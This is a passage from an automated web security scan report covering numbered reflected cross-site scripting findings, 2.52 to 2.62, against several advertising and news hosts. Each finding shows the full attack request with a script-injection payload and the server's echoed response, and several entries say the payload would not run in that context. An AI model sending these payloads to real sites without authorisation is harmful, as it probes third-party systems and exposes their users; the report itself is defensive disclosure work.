Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 392
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-Legacy/All46703"><script>alert(1)</script>3613c51ffe3/14a155dda-808a-4648-a03d-f65de2ef0ada/187855159/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

2.52. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b088e"><script>alert(1)</script>c4e352e43c0 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90b088e"><script>alert(1)</script>c4e352e43c0 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 384
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada/681954732/x90b088e"><script>alert(1)</script>c4e352e43c0/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

2.53. http://choices.truste.com/ca [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the response, which is served as text/javascript, in more than one place: it forms part of a JavaScript identifier (var te_clr1_att02cont3..._ib) and is embedded in a single-quoted string that carries an HTML fragment (<div id="te-clr1-att02cont3...). The payload 8380f<script>alert(1)</script>6e68ad76aa0 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof of concept shows that the parameter is reflected into JavaScript source without encoding. As submitted, the payload turns the var declaration into a syntax error, so none of the script runs; demonstrating execution would need input that is valid in identifier position or that closes the single-quoted string, and the report does not include such a test. The HTML fragment carried in that string is a second place the value reaches once the script parses.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont38380f<script>alert(1)</script>6e68ad76aa0&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:04 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4521

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
baseName] = bindings;
   }
}

   // prototypes
   String.prototype.equalsIgnoreCase = function(arg) {
       return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());
   }

   var te_clr1_att02cont38380f<script>alert(1)</script>6e68ad76aa0_ib = '<div id="te-clr1-att02cont38380f<script>
...[SNIP]...

2.54. http://choices.truste.com/ca [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the h request parameter is copied into an unquoted numeric value ('height':90...) of a JavaScript object literal in a response served as text/javascript. The payload 494f6<script>alert(1)</script>1666fb1c095 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof of concept shows that the parameter is reflected into bare JavaScript without validation. In that position the <script> tags are not markup: the payload produces a syntax error and nothing executes. Execution would require input that is syntactically valid JavaScript at that point, which the report does not test.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90494f6<script>alert(1)</script>1666fb1c095&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4121

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728,'height':90494f6<script>alert(1)</script>1666fb1c095,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont3'
...[SNIP]...

2.55. http://choices.truste.com/ca [iplc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the iplc request parameter is copied into a single-quoted JavaScript string ('iplc':'ctr...') in an object literal, in a response served as text/javascript. The payload 15721<script>alert(1)</script>2a12d89ce41 was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

This proof of concept shows that the parameter is reflected without encoding. Inside a single-quoted string in a script resource the <script> tags in this payload are inert; an unencoded single quote would be needed to terminate the string, and the report does not test whether one is reflected.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr15721<script>alert(1)</script>2a12d89ce41 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4029

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728,'height':90,'ox':20,'oy':0,'plc':'tr','iplc':'ctr15721<script>alert(1)</script>2a12d89ce41','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont3','noticeBaseUrl':'http://choices.trust
...[SNIP]...

2.56. http://choices.truste.com/ca [ox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the ox request parameter is copied into an unquoted numeric value ('ox':20...) of a JavaScript object literal in a response served as text/javascript. The payload 125a2<script>alert(1)</script>e1a6fd9e849 was submitted in the ox parameter. This input was echoed unmodified in the application's response.

This proof of concept shows that the parameter is reflected into bare JavaScript without validation. As with the h parameter, the payload is a syntax error in that position and nothing executes; execution would require syntactically valid JavaScript at that point, which the report does not test.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20125a2<script>alert(1)</script>e1a6fd9e849&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4029

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728,'height':90,'ox':20125a2<script>alert(1)</script>e1a6fd9e849,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont3','notice
...[SNIP]...

2.57. http://choices.truste.com/ca [plc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into a single-quoted JavaScript string ('plc':'tr...') in an object literal, in a response served as text/javascript. The payload 119da<script>alert(1)</script>1f53089f8a1 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof of concept shows that the parameter is reflected without encoding. The <script> tags in this payload are inert inside a single-quoted string in a script resource; an unencoded single quote would be needed to terminate the string, and the report does not test whether one is reflected.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr119da<script>alert(1)</script>1f53089f8a1&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4029

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728,'height':90,'ox':20,'oy':0,'plc':'tr119da<script>alert(1)</script>1f53089f8a1','iplc':'ctr','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont3','noticeBaseUrl':'http://
...[SNIP]...

2.58. http://choices.truste.com/ca [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the w request parameter is copied into an unquoted numeric value ('width':728...) of a JavaScript object literal in a response served as text/javascript. The payload 759b0<script>alert(1)</script>4cc70211f6 was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof of concept shows that the parameter is reflected into bare JavaScript without validation. The payload is a syntax error in that position and nothing executes; execution would require syntactically valid JavaScript at that point, which the report does not test.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728759b0<script>alert(1)</script>4cc70211f6&h=90&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4120

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728759b0<script>alert(1)</script>4cc70211f6,'height':90,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':
...[SNIP]...

2.59. http://choices.truste.com/ca [zi parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into a single-quoted JavaScript string ('zindex':'10002...') in an object literal, in a response served as text/javascript. The payload 757cf<script>alert(1)</script>9c81586b66e was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof of concept shows that the parameter is reflected without encoding. The <script> tags in this payload are inert inside a single-quoted string in a script resource; an unencoded single quote would be needed to terminate the string, and the report does not test whether one is reflected.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002757cf<script>alert(1)</script>9c81586b66e&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4029

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
overlay(te_clr1_att02cont3_bi)','icon':'http://choices.truste.com/assets/admarker.png','icon_cam':'http://choices.truste.com/assets/adicon.png','iconText':'','aid':'att02','pid':'mec01','zindex':'10002757cf<script>alert(1)</script>9c81586b66e','cam':'2'};

   var tecabaseurl = 'choices.truste.com';

   truste.ca.addEvent(window, 'load', function() {
       if(!truste.defjsload) {
           var element = document.createElement('script');
           element.src = '
...[SNIP]...

2.60. http://content.usatoday.com/apps/insidepage/crc.ashx [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /apps/insidepage/crc.ashx

Issue detail

The value of the callback request parameter is copied, unencoded, into the start of a JSONP response served as application/json, where it is emitted as the bare JavaScript function name that wraps the JSON argument. The payload 98134<script>alert(1)</script>2d20feb71dc was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof of concept shows that the callback name is not validated. A browser that honours the declared application/json type will not render the <script> tags as HTML, so the finding is exploitable as reflected XSS only where the response is content-sniffed as HTML; in any case the endpoint lets a caller place arbitrary text ahead of the JSON body. Restricting the callback to a JavaScript identifier and sending X-Content-Type-Options: nosniff addresses both.

Request

GET /apps/insidepage/crc.ashx?callback=commentcount98134<script>alert(1)</script>2d20feb71dc&articleId=46732364.story HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; s_ppv=24

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:38:56 GMT
Content-Length: 132

commentcount98134<script>alert(1)</script>2d20feb71dc({"articleId": "46732364.story","commentCount": "137","recommendCount": "11"});

2.61. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac370'%3balert(1)//316d65e6609 was submitted in the $ parameter. This input was echoed as ac370';alert(1)//316d65e6609 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=ac370'%3balert(1)//316d65e6609&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:ac370';alert(1)//316d65e6609;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1589B1099,2#702968|0,1,1;expires=Wed, 08 Jun 2011 15:36:11 GMT;path=/;domain=.zedo.com;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=158
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:11 GMT
Connection: close
Content-Length: 2055

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',ac370';alert(1)//316d65e6609';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,ac370';alert(1)//316d65e6609;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasA
...[SNIP]...

2.62. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87099"%3balert(1)//5fff92f106d was submitted in the $ parameter. This input was echoed as 87099";alert(1)//5fff92f106d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

